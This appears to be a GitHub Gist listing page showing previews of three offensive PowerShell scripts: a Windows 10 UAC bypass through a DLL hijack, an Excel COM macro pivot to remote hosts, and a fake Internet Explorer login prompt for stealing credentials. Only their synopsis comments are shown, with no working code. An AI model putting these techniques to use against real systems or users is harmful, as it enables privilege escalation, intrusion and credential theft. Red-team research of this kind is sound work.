firefalc0n firefalc0n
firefalc0n
/ UACBypass.ps1
Created
September 23, 2017 00:33
— forked from enigma0x3/UACBypass.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-UACBypass { | |
| <# | |
| .SYNOPSIS | |
| Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy. | |
| Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3) | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Optional Dependencies: None |
firefalc0n
/ Invoke-ExcelMacroPivot.ps1
Created
September 14, 2017 00:42
— forked from enigma0x3/Invoke-ExcelMacroPivot.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-ExcelMacroPivot{ | |
| <# | |
| .AUTHOR | |
| Matt Nelson (@enigma0x3) | |
| .SYNOPSIS | |
| Pivots to a remote host by using an Excel macro and Excel's COM object | |
| .PARAMETER Target | |
| Remote host to pivot to | |
| .PARAMETER RemoteDocumentPath | |
| Local path on the remote host where the payload resides |
firefalc0n
/ powerset_creds.ps1
Created
September 10, 2017 12:50
"creds.ps1" will wait for user to open iexplore.exe. Upon the execution of iexplore.exe, the script will stop it and pop up a window telling the user to "Input his/her username and password to use it".
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ######################################################################################################################## | |
| #creds.ps1 | |
| #Used to socially steal a user's credentials | |
| #Script by: LogoiLab | |
| # | |
| #synopsis: | |
| # | |
| #When run: "creds.ps1" will wait for user to open iexplore.exe(internet explorer). Upon the execution of iexplore.exe | |
| #the script will stop iexplore.exe and pop up a window telling the user to "Input his/her username and password to use | |
| #Internet Explorer" it will then check the creds agianst the SAM Module, if they dont match the current user's, it will |
NewerOlder